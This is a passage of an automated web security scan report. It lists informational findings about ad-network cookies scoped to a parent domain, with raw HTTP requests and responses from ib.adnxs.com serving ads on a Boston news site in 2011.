GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-98462601_1296252387%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D274606%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9608076433651149%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb119885=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb855999=5_[r^208WMM2x@N!@@-#bq9B8?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP8bZnQsCO006BWHfHSmrEEKBcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEIwkBAgUCAAIAAAAAjSFWAgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265345%29%3Buf%28%27r%27%2C+116344%2C+1296265345%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:25 GMT
Content-Length: 741

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-98462601_1296252387,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.73. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-31727353_1296259318%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D604786%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb781784=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 00:01:58 GMT
Content-Length: 826

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-31727353_1296259318,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.74. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-59440650_1296255616%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D901204%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 23:00:16 GMT
Content-Length: 826

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-59440650_1296255616,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.75. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb506874=5_[r^208WMM2x@N!@@-#aWxt4?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP9q3wM3c37k8BWHfHSmrEEJ9cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgUBAgUCAAIAAAAAtyQC8QAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265341%29%3Buf%28%27r%27%2C+116344%2C+1296265341%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5Q%JvH4xDy_Pa]7S).d*U`>Ok$)gcuXD-L66R1@O4vp]ccG_H+%(u%mQtz*[d<.HEQ2b+)89LT/'^G@=+00].ps-rcmC0]*`Bb^`#V*AM6Ne*R5L=aW-ObhHV=.^C5BoO'uuJk8/]y:]wAdA6qeH?q7qFudKnD[)aHje%=uq$/OH'(wercy6M%TG:^q9-lPoF(K[-HVk; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:21 GMT
Content-Length: 663

